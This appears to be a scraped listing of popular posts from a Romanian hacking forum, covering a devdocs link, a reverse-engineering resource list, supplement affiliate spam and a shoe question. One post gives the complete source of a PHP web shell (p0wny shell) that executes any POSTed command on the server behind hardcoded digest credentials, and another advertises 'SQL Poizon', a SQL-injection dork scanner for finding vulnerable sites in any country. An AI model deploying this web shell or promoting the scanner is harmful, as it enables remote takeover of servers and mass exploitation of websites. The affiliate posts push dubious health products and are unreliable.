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  1. https://devdocs.io/ Mi-am adus aminte recent de el, poate mai ajuta pe careva.
    2 points
  2. SQL Poizon v1.1 – SQLi Exploit Scanner, Search Hunter, Injection Builder Tool ---------------------------------------------------------------------------------------- SQL Poizon v1.1 – SQLi Exploit Scanner, Search Hunter, Injection Builder Tool is a tool which scans website through dorks automatically and finds vulnerabilities in them its very easy powerful too, to find vulnerable site of any country. New Features : “Look &Feel” is more attractive now. Rich “Context Menu” items. “Results” contain checkboxes to enable selection. “Selected Dork” box is editable now for user convenience. Built-in Browser for “Injection Builder” to check the impact of injection. “Text Bucket” available for “Injection Builder” to save extra data. “Insert Order By” button is added to “Injection Builder”. “Internet Browser” with Snapshot and HTML DOM Tree. Bug Fixes : It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay. Progress bar for “Crawler” has been fixed. It will show correct progress now. Error on importing file is fixed now. You can import files from other directories as well. “Searchqu” shows invalid results. It is fixed now. Download : Password: rst
    1 point
  3. Am rezolvat: Shell.php: <?php include 'login.php'; function featureShell($cmd, $cwd) { $stdout = array(); if (preg_match("/^\s*cd\s*$/", $cmd)) { // pass } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { chdir($cwd); preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); chdir($match[1]); } else { chdir($cwd); exec($cmd, $stdout); } return array( "stdout" => $stdout, "cwd" => getcwd() ); } function featurePwd() { return array("cwd" => getcwd()); } function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == 'cmd') { $cmd = "compgen -c $fileName"; } else { $cmd = "compgen -f $fileName"; } $cmd = "/bin/bash -c \"$cmd\""; $files = explode("\n", shell_exec($cmd)); return array( 'files' => $files, ); } if (isset($_GET["feature"])) { $response = NULL; switch ($_GET["feature"]) { case "shell": $cmd = $_POST['cmd']; if (!preg_match('/2>/', $cmd)) { $cmd .= ' 2>&1'; } $response = featureShell($cmd, $_POST["cwd"]); break; case "pwd": $response = featurePwd(); break; case "hint": $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']); } echo json_encode($response); die(); } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>p0wny@shell:~#</title> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <style> html, body { margin: 0; padding: 0; background: #333; color: #eee; font-family: monospace; } #shell { background: #222; max-width: 800px; margin: 50px auto 0 auto; box-shadow: 0 0 5px rgba(0, 0, 0, .3); font-size: 10pt; display: flex; flex-direction: column; align-items: stretch; } #shell-content { height: 500px; overflow: auto; padding: 5px; white-space: pre-wrap; flex-grow: 1; } #shell-logo { font-weight: bold; color: #FF4180; text-align: center; } @media (max-width: 991px) { #shell-logo { display: none; } html, body, #shell { height: 100%; width: 100%; max-width: none; } #shell { margin-top: 0; } } @media (max-width: 767px) { #shell-input { flex-direction: column; } } .shell-prompt { font-weight: bold; color: #75DF0B; } .shell-prompt > span { color: #1BC9E7; } #shell-input { display: flex; box-shadow: 0 -1px 0 rgba(0, 0, 0, .3); border-top: rgba(255, 255, 255, .05) solid 1px; } #shell-input > label { flex-grow: 0; display: block; padding: 0 5px; height: 30px; line-height: 30px; } #shell-input #shell-cmd { height: 30px; line-height: 30px; border: none; background: transparent; color: #eee; font-family: monospace; font-size: 10pt; width: 100%; align-self: center; } #shell-input div { flex-grow: 1; align-items: stretch; } #shell-input input { outline: none; } </style> <script> var CWD = null; var commandHistory = []; var historyPosition = 0; var eShellCmdInput = null; var eShellContent = null; function _insertCommand(command) { eShellContent.innerHTML += "\n\n"; eShellContent.innerHTML += '<span class=\"shell-prompt\">' + genPrompt(CWD) + '</span> '; eShellContent.innerHTML += escapeHtml(command); eShellContent.innerHTML += "\n"; eShellContent.scrollTop = eShellContent.scrollHeight; } function _insertStdout(stdout) { eShellContent.innerHTML += escapeHtml(stdout); eShellContent.scrollTop = eShellContent.scrollHeight; } function featureShell(command) { _insertCommand(command); makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function(response) { _insertStdout(response.stdout.join("\n")); updateCwd(response.cwd); }); } function featureHint() { if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete function _requestCallback(data) { if (data.files.length <= 1) return; // no completion if (data.files.length === 2) { if (type === 'cmd') { eShellCmdInput.value = data.files[0]; } else { var currentValue = eShellCmdInput.value; eShellCmdInput.value = currentValue.replace(/([^\s]*)$/, data.files[0]); } } else { _insertCommand(eShellCmdInput.value); _insertStdout(data.files.join("\n")); } } var currentCmd = eShellCmdInput.value.split(" "); var type = (currentCmd.length === 1) ? "cmd" : "file"; var fileName = (type === "cmd") ? currentCmd[0] : currentCmd[currentCmd.length - 1]; makeRequest( "?feature=hint", { filename: fileName, cwd: CWD, type: type }, _requestCallback ); } function genPrompt(cwd) { cwd = cwd || "~"; var shortCwd = cwd; if (cwd.split("/").length > 3) { var splittedCwd = cwd.split("/"); shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1]; } return "p0wny@shell:<span title=\"" + cwd + "\">" + shortCwd + "</span>#"; } function updateCwd(cwd) { if (cwd) { CWD = cwd; _updatePrompt(); return; } makeRequest("?feature=pwd", {}, function(response) { CWD = response.cwd; _updatePrompt(); }); } function escapeHtml(string) { return string .replace(/&/g, "&amp;") .replace(/</g, "&lt;") .replace(/>/g, "&gt;"); } function _updatePrompt() { var eShellPrompt = document.getElementById("shell-prompt"); eShellPrompt.innerHTML = genPrompt(CWD); } function _onShellCmdKeyDown(event) { switch (event.key) { case "Enter": featureShell(eShellCmdInput.value); insertToHistory(eShellCmdInput.value); eShellCmdInput.value = ""; break; case "ArrowUp": if (historyPosition > 0) { historyPosition--; eShellCmdInput.blur(); eShellCmdInput.focus(); eShellCmdInput.value = commandHistory[historyPosition]; } break; case "ArrowDown": if (historyPosition >= commandHistory.length) { break; } historyPosition++; if (historyPosition === commandHistory.length) { eShellCmdInput.value = ""; } else { eShellCmdInput.blur(); eShellCmdInput.focus(); eShellCmdInput.value = commandHistory[historyPosition]; } break; case 'Tab': event.preventDefault(); featureHint(); break; } } function insertToHistory(cmd) { commandHistory.push(cmd); historyPosition = commandHistory.length; } function makeRequest(url, params, callback) { function getQueryString() { var a = []; for (var key in params) { if (params.hasOwnProperty(key)) { a.push(encodeURIComponent(key) + "=" + encodeURIComponent(params[key])); } } return a.join("&"); } var xhr = new XMLHttpRequest(); xhr.open("POST", url, true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { try { var responseJson = JSON.parse(xhr.responseText); callback(responseJson); } catch (error) { alert("Error while parsing response: " + error); } } }; xhr.send(getQueryString()); } window.onload = function() { eShellCmdInput = document.getElementById("shell-cmd"); eShellContent = document.getElementById("shell-content"); updateCwd(); eShellCmdInput.focus(); }; </script> </head> <body> <div id="shell"> <pre id="shell-content"></pre> <div id="shell-input"> <label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label> <div> <input id="shell-cmd" name="cmd" onkeydown="_onShellCmdKeyDown(event)"/> </div> </div> </div> </body> </html> Login.php: <?php $realm = 'Restricted area'; //user => password $users = array('userutul' => 'paroluta'); if (empty($_SERVER['PHP_AUTH_DIGEST'])) { header('HTTP/1.1 401 Unauthorized'); header('WWW-Authenticate: Digest realm="'.$realm. '",qop="auth",nonce="'.uniqid().'",opaque="'.md5($realm).'"'); die('Apesi cancel ca bou.. Bagale daca esti jmeq :))'); } // analyze the PHP_AUTH_DIGEST variable if (!($data = http_digest_parse($_SERVER['PHP_AUTH_DIGEST'])) || !isset($users[$data['username']])) die('Wrong Credentials!'); // generate the valid response $A1 = md5($data['username'] . ':' . $realm . ':' . $users[$data['username']]); $A2 = md5($_SERVER['REQUEST_METHOD'].':'.$data['uri']); $valid_response = md5($A1.':'.$data['nonce'].':'.$data['nc'].':'.$data['cnonce'].':'.$data['qop'].':'.$A2); if ($data['response'] != $valid_response) die('Wrong Credentials!'); // function to parse the http auth header function http_digest_parse($txt) { // protect against missing data $needed_parts = array('nonce'=>1, 'nc'=>1, 'cnonce'=>1, 'qop'=>1, 'username'=>1, 'uri'=>1, 'response'=>1); $data = array(); $keys = implode('|', array_keys($needed_parts)); preg_match_all('@(' . $keys . ')=(?:([\'"])([^\2]+?)\2|([^\s,]+))@', $txt, $matches, PREG_SET_ORDER); foreach ($matches as $m) { $data[$m[1]] = $m[3] ? $m[3] : $m[4]; unset($needed_parts[$m[1]]); } return $needed_parts ? false : $data; } ?>
    1 point
  4. Books Reverse Engineering Books The IDA Pro Book Reverse Engineering for Beginners The Art of Assembly Language Practical Reverse Engineering Reversing: Secrets of Reverse Engineering Practical Malware Analysis Malware Analyst's Cookbook Gray Hat Hacking The Art of Memory Forensics Hacking: The Art of Exploitation Fuzzing for Software Security Art of Software Security Assessment The Antivirus Hacker's Handbook The Rootkit Arsenal Windows Internals Part 1 Part 2 Inside Windows Debugging iOS Reverse Engineering Courses Reverse Engineering Courses Lenas Reversing for Newbies Open Security Training Dr. Fu's Malware Analysis Binary Auditing Course TiGa's Video Tutorials Legend of Random Modern Binary Exploitation RPISEC Malware Course SANS FOR 610 GREM REcon Training Blackhat Training Offensive Security Corelan Training Offensive and Defensive Android Reversing Practice Practice Reverse Engineering. Be careful with malware. OSX Crackmes ESET Challenges Flare-on Challenges Github CTF Archives Reverse Engineering Challenges xorpd Advanced Assembly Exercises Virusshare.com Contagio Malware-Traffic-Analysis Malshare Malware Blacklist malwr.com vxvault Hex Editors Hex Editors HxD 010 Editor Hex Workshop HexFiend Hiew hecate Binary Format Binary Format Tools CFF Explorer Cerbero Profiler // Lite PE Insider Detect It Easy PeStudio PEiD MachoView nm - View Symbols file - File information codesign - Code signing information usage: codesign -dvvv filename Disassemblers Disassemblers IDA Pro Binary Ninja Radare Hopper Capstone objdump fREedom Binary Analysis Binary Analysis Resources Mobius Resources z3 bap angr Bytecode Analysis Bytecode Analysis Tools dnSpy Bytecode Viewer Bytecode Visualizer JPEXS Flash Decompiler Import Reconstruction Import Reconstruction Tools ImpRec Scylla LordPE Dynamic Analysis Dynamic Analysis Tools ProcessHacker Process Explorer Process Monitor Autoruns Noriben API Monitor iNetSim SmartSniff TCPView Wireshark Fakenet Volatility Dumpit LiME Cuckoo Objective-See Utilities XCode Instruments - XCode Instruments for Monitoring Files and Processes User Guide dtrace - sudo dtruss = strace dtrace recipes fs_usage - report system calls and page faults related to filesystem activity in real-time. File I/O: fs_usage -w -f filesystem dmesg - display the system message buffer Debugging Debugging Tools WinDbg OllyDbg v1.10 OllyDbg v2.01 OllySnD Olly Shadow Olly CiMs Olly UST_2bg x64dbg gdb vdb lldb qira unicorn Mac Decrypt Mac Decrypting Tools Cerbero Profiler - Select all -> Copy to new file AppEncryptor - Tool for decrypting Class-Dump - use deprotect option readmem - OS X Reverser's process dumping tool Document Analysis Document Analysis Tools Ole Tools Didier's PDF Tools Origami Scripting Scripting IDA Python Src IDC Functions Doc Using IDAPython to Make your Life Easier Introduction to IDA Python The Beginner's Guide to IDA Python IDA Plugin Contest onehawt IDA Plugin List pefile Python Library Android Android tools Android Studio APKtool dex2jar Bytecode Viewer IDA Pro JaDx Yara Yara Resources Yara docs Cheatsheet yarGen Yara First Presentation https://github.com/wtsxDev/reverse-engineering
    1 point
  5. S`a dus viata lor O sa le dea aia 300 ani de parnaie ...
    1 point
  6. Salut! LeadReaktor ridică plățile pentru slabirea cu Idealica și solutia pentru potența Casanova în România pentru 3 dolari, dar daca va-ti nascut si locuiti in Romania atunci cu 4 dolari ! De ce ? Pentruca putem. Cine cunoaște piața țării sale mai bine decât locuitorii ei ? Nimeni. Deci, considerați această creştere a ratei ca fiind o suprataxă pentru expertiza dvs. Sau poate pur şi simplu ne este teamă de dracula ? Cine ştie In orice caz hai sa fim prieteni ! De la voi cerem trafic , noi va oferim procent 60% şi consultanti români in callcentru ! Și rețineți că în curând intenționăm să lansăm un premiu valoros pentru ofertele noastre din România. Care ? - pînă cînd este Secret. Dar nu este secret ca saniile trebuie pregatite vara, aşa că ne pregătim mai devreme - vom avea un avantaj Inregiztrează-te si incepem: http://leadreaktor.com/en/signup Dacă au rămas intrebări - va răspunde managerul vostru personal.
    -1 points
  7. LeadReaktor - retea privata, o agentie de publicitate CPA cu sediu European si în țările Tier-1 și Tier-2, cu propriile produse și call-center europene, în care vorbitorii nativi lucrează pentru fiecare prezență geografică. Piețele princiaple includ: Germania, Austria, Spania, Italia, Grecia, România, Bulgaria și Polonia. Linia noastra de produse, se bazeaza pe suplimente alimentare, produse pentru slabit, remedii pentru persoanele cu virsta inaintata și produse pentru inbunatatirea sănătății masculine. Toate produsele sunt fabricate în Europa (Franța, Italia, Polonia), sunt protejate de dreptul internațional și au certificate internaționale de calitate ISO. Toate produsele sunt testate temeinic înainte de a fi introduse pe piață, iar după lansare, sunt disponibile la orice ora. Avem propriile noastre call-center in Europa. Operatorii nostri sunt vorbitori nativi de limba în dependentă de țara in care activeaza, astfel incat sa inteleaga perfect mentalitatea locala. Toti sunt vinzatori cu experiența și au scenarii unice de vanzari, aplicate zilnic. Vazarile sunt dupa modelul de ,,achitare la primire,,. Avem deja multe materiale promoționale și putem face fata la cererererile dvs. în conformitate cu dorințele dvs. tehnice. Echipa de creație a celor mai buni designeri, copywriteri și traducători de limbă maternă vă stă la dispoziție, tot pentru obtine rezultate inalte de confirmare. Acceptăm toate tipurile de trafic: websites, contextual ads, teasers, social networks, doorways, brand bidding, targeted ads, e-mail and resale. Efectuam plăți la cerere și la sisteme convenabile de plată (Wire-transfer, PayPal, PaySera, E-Payments, WebMoney). Dacă lucrați la fel de pasionat, cum o facem noi, vom face o echipă minunată.
    -1 points
  8. Salutare. Vreau si eu sa imi iau niste mocasini mai de doamne ajuta. Am tot avut din-astia ieftini asa si s-au stricat mereu. Am gasit pe epantofi https://www.epantofi.ro/dama/pantofi/mocasini.html unii GEOX care am auzit ca sunt super buni. Ati cumparat de la GEOX vreodata ceva? Puteti sa veniti cu ceva recomandari?
    -3 points
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